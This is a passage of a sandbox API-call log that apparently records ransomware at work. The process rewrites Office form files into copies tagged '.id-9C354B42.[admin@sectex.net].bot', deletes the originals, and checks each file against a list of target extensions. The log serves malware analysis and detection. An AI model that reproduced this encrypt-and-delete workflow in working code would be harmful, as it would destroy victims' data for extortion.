	[0160.227] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.227] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfnot.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0160.228] GetLastError () returned 0x0
	[0160.228] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x436, lpOverlapped=0x0) returned 1
	[0160.230] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x440, lpOverlapped=0x0) returned 1
	[0160.230] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.231] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0160.231] SetEndOfFile (hFile=0x398) returned 1
	[0160.231] CloseHandle (hObject=0x398) returned 1
	[0160.231] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.231] SetEndOfFile (hFile=0x3f0) returned 1
	[0160.233] CloseHandle (hObject=0x3f0) returned 1
	[0160.233] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.233] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfnot.ico")) returned 1
	[0160.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO") returned 64
	[0160.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO") returned 64
	[0160.234] lstrlenW (lpString=".doc") returned 4
	[0160.234] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.234] lstrlenW (lpString=".docx") returned 5
	[0160.234] lstrcmpiW (lpString1=".docx", lpString2="T.ICO") returned -1
	[0160.234] lstrlenW (lpString=".pdf") returned 4
	[0160.234] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.234] lstrlenW (lpString=".xls") returned 4
	[0160.234] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.234] lstrlenW (lpString=".xlsx") returned 5
	[0160.234] lstrcmpiW (lpString1=".xlsx", lpString2="T.ICO") returned -1
	[0160.234] lstrlenW (lpString=".ppt") returned 4
	[0160.234] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO") returned 64
	[0160.234] lstrlenW (lpString=".zip") returned 4
	[0160.234] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.234] lstrlenW (lpString=".rar") returned 4
	[0160.234] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.234] lstrlenW (lpString=".bz2") returned 4
	[0160.234] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.234] lstrlenW (lpString=".7z") returned 3
	[0160.234] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO") returned 64
	[0160.235] lstrlenW (lpString=".dbf") returned 4
	[0160.235] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO") returned 64
	[0160.235] lstrlenW (lpString=".1cd") returned 4
	[0160.235] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO") returned 64
	[0160.235] lstrlenW (lpString=".jpg") returned 4
	[0160.235] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO") returned 64
	[0160.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO") returned 64
	[0160.235] lstrlenW (lpString=".doc") returned 4
	[0160.235] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.235] lstrlenW (lpString=".docx") returned 5
	[0160.235] lstrcmpiW (lpString1=".docx", lpString2="T.ICO") returned -1
	[0160.235] lstrlenW (lpString=".pdf") returned 4
	[0160.235] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.235] lstrlenW (lpString=".xls") returned 4
	[0160.235] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.235] lstrlenW (lpString=".xlsx") returned 5
	[0160.235] lstrcmpiW (lpString1=".xlsx", lpString2="T.ICO") returned -1
	[0160.235] lstrlenW (lpString=".ppt") returned 4
	[0160.235] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO") returned 64
	[0160.235] lstrlenW (lpString=".zip") returned 4
	[0160.235] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.236] lstrlenW (lpString=".rar") returned 4
	[0160.236] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.236] lstrlenW (lpString=".bz2") returned 4
	[0160.236] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.236] lstrlenW (lpString=".7z") returned 3
	[0160.236] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO") returned 64
	[0160.236] lstrlenW (lpString=".dbf") returned 4
	[0160.236] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO") returned 64
	[0160.236] lstrlenW (lpString=".1cd") returned 4
	[0160.236] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO") returned 64
	[0160.236] lstrlenW (lpString=".jpg") returned 4
	[0160.236] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.236] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0160.236] lstrlenW (lpString="CNFRES.CFG") returned 10
	[0160.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfres.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.237] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=338) returned 1
	[0160.237] CloseHandle (hObject=0x3f0) returned 1
	[0160.237] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfres.cfg")) returned 0x20
	[0160.237] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfres.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfres.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.238] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.238] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfres.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0160.239] GetLastError () returned 0x0
	[0160.239] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x152, lpOverlapped=0x0) returned 1
	[0160.239] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x160, lpOverlapped=0x0) returned 1
	[0160.240] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.240] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0160.241] SetEndOfFile (hFile=0x398) returned 1
	[0160.241] CloseHandle (hObject=0x398) returned 1
	[0160.241] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.241] SetEndOfFile (hFile=0x3f0) returned 1
	[0160.243] CloseHandle (hObject=0x3f0) returned 1
	[0160.243] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.243] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfres.cfg")) returned 1
	[0160.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG") returned 64
	[0160.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG") returned 64
	[0160.244] lstrlenW (lpString=".doc") returned 4
	[0160.244] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0160.244] lstrlenW (lpString=".docx") returned 5
	[0160.244] lstrcmpiW (lpString1=".docx", lpString2="S.CFG") returned -1
	[0160.244] lstrlenW (lpString=".pdf") returned 4
	[0160.244] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0160.244] lstrlenW (lpString=".xls") returned 4
	[0160.244] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0160.244] lstrlenW (lpString=".xlsx") returned 5
	[0160.244] lstrcmpiW (lpString1=".xlsx", lpString2="S.CFG") returned -1
	[0160.244] lstrlenW (lpString=".ppt") returned 4
	[0160.244] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0160.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG") returned 64
	[0160.244] lstrlenW (lpString=".zip") returned 4
	[0160.244] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0160.244] lstrlenW (lpString=".rar") returned 4
	[0160.244] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0160.244] lstrlenW (lpString=".bz2") returned 4
	[0160.244] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0160.245] lstrlenW (lpString=".7z") returned 3
	[0160.245] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0160.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG") returned 64
	[0160.245] lstrlenW (lpString=".dbf") returned 4
	[0160.245] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0160.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG") returned 64
	[0160.245] lstrlenW (lpString=".1cd") returned 4
	[0160.245] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0160.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG") returned 64
	[0160.245] lstrlenW (lpString=".jpg") returned 4
	[0160.245] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0160.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG") returned 64
	[0160.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG") returned 64
	[0160.245] lstrlenW (lpString=".doc") returned 4
	[0160.245] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0160.245] lstrlenW (lpString=".docx") returned 5
	[0160.245] lstrcmpiW (lpString1=".docx", lpString2="S.CFG") returned -1
	[0160.245] lstrlenW (lpString=".pdf") returned 4
	[0160.245] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0160.245] lstrlenW (lpString=".xls") returned 4
	[0160.245] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0160.245] lstrlenW (lpString=".xlsx") returned 5
	[0160.245] lstrcmpiW (lpString1=".xlsx", lpString2="S.CFG") returned -1
	[0160.245] lstrlenW (lpString=".ppt") returned 4
	[0160.245] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0160.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG") returned 64
	[0160.245] lstrlenW (lpString=".zip") returned 4
	[0160.245] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0160.245] lstrlenW (lpString=".rar") returned 4
	[0160.245] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0160.245] lstrlenW (lpString=".bz2") returned 4
	[0160.246] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0160.246] lstrlenW (lpString=".7z") returned 3
	[0160.246] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0160.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG") returned 64
	[0160.246] lstrlenW (lpString=".dbf") returned 4
	[0160.246] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0160.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG") returned 64
	[0160.246] lstrlenW (lpString=".1cd") returned 4
	[0160.246] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0160.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG") returned 64
	[0160.246] lstrlenW (lpString=".jpg") returned 4
	[0160.246] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0160.246] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0160.246] lstrlenW (lpString="CONFLICT.ICO") returned 12
	[0160.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\conflict.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.247] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=2998) returned 1
	[0160.247] CloseHandle (hObject=0x3f0) returned 1
	[0160.247] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\conflict.ico")) returned 0x20
	[0160.247] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\conflict.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\conflict.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.247] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.247] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\conflict.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0160.250] GetLastError () returned 0x0
	[0160.250] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0160.257] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0160.257] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.258] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.258] SetEndOfFile (hFile=0x398) returned 1
	[0160.258] CloseHandle (hObject=0x398) returned 1
	[0160.258] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.258] SetEndOfFile (hFile=0x3f0) returned 1
	[0160.261] CloseHandle (hObject=0x3f0) returned 1
	[0160.261] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.261] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\conflict.ico")) returned 1
	[0160.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO") returned 66
	[0160.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO") returned 66
	[0160.262] lstrlenW (lpString=".doc") returned 4
	[0160.262] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.262] lstrlenW (lpString=".docx") returned 5
	[0160.262] lstrcmpiW (lpString1=".docx", lpString2="T.ICO") returned -1
	[0160.262] lstrlenW (lpString=".pdf") returned 4
	[0160.262] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.262] lstrlenW (lpString=".xls") returned 4
	[0160.262] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.262] lstrlenW (lpString=".xlsx") returned 5
	[0160.262] lstrcmpiW (lpString1=".xlsx", lpString2="T.ICO") returned -1
	[0160.262] lstrlenW (lpString=".ppt") returned 4
	[0160.262] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO") returned 66
	[0160.262] lstrlenW (lpString=".zip") returned 4
	[0160.262] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.262] lstrlenW (lpString=".rar") returned 4
	[0160.262] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.262] lstrlenW (lpString=".bz2") returned 4
	[0160.262] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.262] lstrlenW (lpString=".7z") returned 3
	[0160.262] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO") returned 66
	[0160.262] lstrlenW (lpString=".dbf") returned 4
	[0160.262] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO") returned 66
	[0160.262] lstrlenW (lpString=".1cd") returned 4
	[0160.263] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO") returned 66
	[0160.263] lstrlenW (lpString=".jpg") returned 4
	[0160.263] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO") returned 66
	[0160.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO") returned 66
	[0160.263] lstrlenW (lpString=".doc") returned 4
	[0160.263] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.263] lstrlenW (lpString=".docx") returned 5
	[0160.263] lstrcmpiW (lpString1=".docx", lpString2="T.ICO") returned -1
	[0160.263] lstrlenW (lpString=".pdf") returned 4
	[0160.263] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.263] lstrlenW (lpString=".xls") returned 4
	[0160.263] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.263] lstrlenW (lpString=".xlsx") returned 5
	[0160.263] lstrcmpiW (lpString1=".xlsx", lpString2="T.ICO") returned -1
	[0160.263] lstrlenW (lpString=".ppt") returned 4
	[0160.263] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO") returned 66
	[0160.263] lstrlenW (lpString=".zip") returned 4
	[0160.263] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.263] lstrlenW (lpString=".rar") returned 4
	[0160.263] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.263] lstrlenW (lpString=".bz2") returned 4
	[0160.263] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.263] lstrlenW (lpString=".7z") returned 3
	[0160.263] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO") returned 66
	[0160.263] lstrlenW (lpString=".dbf") returned 4
	[0160.263] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO") returned 66
	[0160.264] lstrlenW (lpString=".1cd") returned 4
	[0160.264] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO") returned 66
	[0160.264] lstrlenW (lpString=".jpg") returned 4
	[0160.264] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.264] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0160.264] lstrlenW (lpString="CONTACT.CFG") returned 11
	[0160.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contact.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.264] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=783) returned 1
	[0160.264] CloseHandle (hObject=0x3f0) returned 1
	[0160.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contact.cfg")) returned 0x20
	[0160.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contact.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contact.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.265] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
